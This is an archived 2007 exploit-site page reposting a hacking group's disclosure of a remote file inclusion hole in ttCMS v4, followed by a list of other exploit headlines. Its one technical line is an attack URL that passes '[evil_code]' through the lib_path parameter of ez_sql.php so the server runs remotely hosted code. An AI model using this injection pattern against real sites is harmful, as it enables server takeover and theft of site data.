exploits , vulnerabilities , articles , ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

2007-03-24

ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

Rated as : Moderate Risk

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim)
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]
securitydot.net - 2007-03-24

Exploits - newest 10 RSS | More

2007-06-15 57319 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34234 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42476 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29357 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19792 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16727 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19434 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16613 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33636 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17252 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit